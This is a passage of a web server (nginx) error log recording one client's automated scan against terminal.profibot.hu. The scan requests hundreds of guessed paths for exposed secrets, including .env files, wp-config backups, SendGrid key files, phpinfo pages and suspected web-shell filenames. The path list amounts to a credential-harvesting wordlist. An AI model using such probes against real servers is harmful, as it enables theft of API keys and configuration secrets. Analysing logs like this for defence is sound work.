terminal.profibot.hu, request: "GET /tmp/config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tmp/logs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /token.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tool/view/phpinfo.view.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tools/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Travel_form/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ts/prime/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tz.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /u.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ubuntu/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ui/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /unixtime/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /unsplash-downloader/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /up.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /upfiles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /upload/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /uploads/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /urlmem-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /user/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /user/login HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /User_info/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /v1/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /v1/admin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /v1/debug/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /v1/private/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /v2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /var/backup/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/github.com/gobuffalo/envy/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/github.com/subosito/gotenv/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendors~main.f286c0f60bdc707d91a8.bundle.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vercel.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /videos/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vite.config.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vm-docker-compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vod_installer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vue-end/vue-til/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vue/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vue/vuecli/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vue_CRM/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /w.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /web-dist/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /web.config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /web.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /web/debug/default/view HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Web/siteMariage/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /webpack-stats.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /webpack.config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /webroot_path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /website/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /websocket/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /webstatic/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /webui/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /well-known/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /whturk/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /windows/tests/9.2.x/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /windows/tests/9.3.x/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wordpress/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:39 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /workspace/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.php-backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.php~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-login.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-login/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wpp-config.php~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /www-data/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /x.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /xx-final/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /yarn.lock HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /zmusic-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /:443/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /:80/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /:8080/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /:8081/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /:8443/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sendgrid_email/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.sendgrid HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sendgrid_keys.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/private/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/uploads/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:40 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/plugins/wp-mail-smtp/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/plugins/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /modules/contrib/sendgrid_mail/sendgrid_mail.module HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /modules/contrib/sendgrid_mail/sendgrid_mail.settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /modules/contrib/sendgrid_mail/sendgrid_mail.services.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /modules/contrib/sendgrid_mail/translations/sendgrid_mail.fr.po HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/themes/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/uploads/wp-mail-smtp/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backup/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-includes/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-admin/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.sendgrid/credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.sendgrid/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/sendgrid_config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/sendgrid_config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup/sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup/sendgrid_config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets/sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets/sendgrid_config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/sendgrid.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /settings/sendgrid_keys HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /settings/sendgrid_config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/settings/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/settings/sendgrid_config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/env/sendgrid.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/env/sendgrid_keys.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /instance/sendgrid_keys.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sendgrid_keys.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sendgrid_keys.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:41 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /keys/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api_keys/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/packages/sendgrid.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/secrets/prod/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/secrets/dev/sendgrid_keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/sendgrid.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/sendgrid.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/sendgrid.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.php.orig HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.phtml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /%c0/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /configs/application.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_profiler/empty/search/results HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: 